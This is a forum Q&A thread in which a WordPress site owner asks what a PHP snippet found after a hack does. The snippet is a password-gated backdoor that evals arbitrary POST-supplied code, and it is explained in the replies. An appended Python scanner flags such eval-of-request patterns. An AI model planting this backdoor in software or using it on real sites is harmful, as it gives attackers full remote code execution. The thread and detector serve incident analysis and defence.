Solved

Decrypt Malicious Inserted PHP

Posted on 2011-09-27
Last Modified: 2012-05-12
I had a client's WordPress website hacked last week because of a leaky thumb.php. Cleaned up the website and replaced the leaky thumb.php. A PHP file was added to the theme's cached:
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
    $cmd = $_POST["code"];
    eval (stripslashes($cmd));
}

I need someone to explain this code to me. Did find: http://wordpress.org/support/topic/new-hack-attempt-on-self-hosted-wordpress-site but no precise explanation was given.

PS: The malicious code consequently added to a WP core file I have not added here.
Question by:rhandalthor
2 Comments
 
Accepted Solution

by: Jason C. Levine earned 500 total points
ID: 36714634
If a specially crafted post is sent to the site with a variable of "key" defined, line 1 evaluates and turns into a command that lines 2 and 3 execute.  

I assume it does something less than optimal :)

Author Comment

by:rhandalthor
ID: 36714679
Yeah. Hadn't worked with $_POST for a while and certainly not this way. Well, think all is cleaned up and fortified again. Thanks Jason.
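For checking the rest of a cleaned site for the same pattern, here is an added example (not part of the original thread) of a heuristic scanner for eval() calls fed by request data. Because the snippet in the question copies $_POST into $cmd first, a plain search for eval($_POST would miss it, so the sketch follows simple assignments; the function name, the sample and its placeholder hash are constructed for illustration.

```python
import re

# Request-controlled PHP superglobals treated as taint sources.
SOURCE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)(.*)", re.S)   # $var = value (not ==)
EVAL = re.compile(r"\beval\s*\((.*)", re.S | re.I)   # eval( argument...
VAR = re.compile(r"\$\w+")


def find_request_eval(php_source):
    """Return (line, statement) for each eval() whose argument derives from request data.

    Heuristic only: splits on ';' and follows plain assignments in file order.
    It does not parse PHP, so treat hits as leads for manual review.
    """
    tainted, hits, offset = set(), [], 0
    for stmt in php_source.split(";"):
        lead = len(stmt) - len(stmt.lstrip())
        line = php_source.count("\n", 0, offset + lead) + 1
        offset += len(stmt) + 1
        call = EVAL.search(stmt)
        if call:
            arg = call.group(1)
            if SOURCE.search(arg) or tainted & set(VAR.findall(arg)):
                hits.append((line, " ".join(stmt.split())))
            continue
        assign = ASSIGN.search(stmt)
        if assign:
            name, value = assign.groups()
            if SOURCE.search(value) or tainted & set(VAR.findall(value)):
                tainted.add(name)       # variable now carries request data
            else:
                tainted.discard(name)   # overwritten with something else
    return hits


# Constructed sample shaped like the snippet in the question (hash replaced).
SAMPLE = '''<?php
if(md5($_POST["key"]) == "MD5_PLACEHOLDER"){
$cmd = $_POST["code"];
eval (stripslashes($cmd));
}
'''

if __name__ == "__main__":
    for line, stmt in find_request_eval(SAMPLE):
        print(f"line {line}: {stmt}")
```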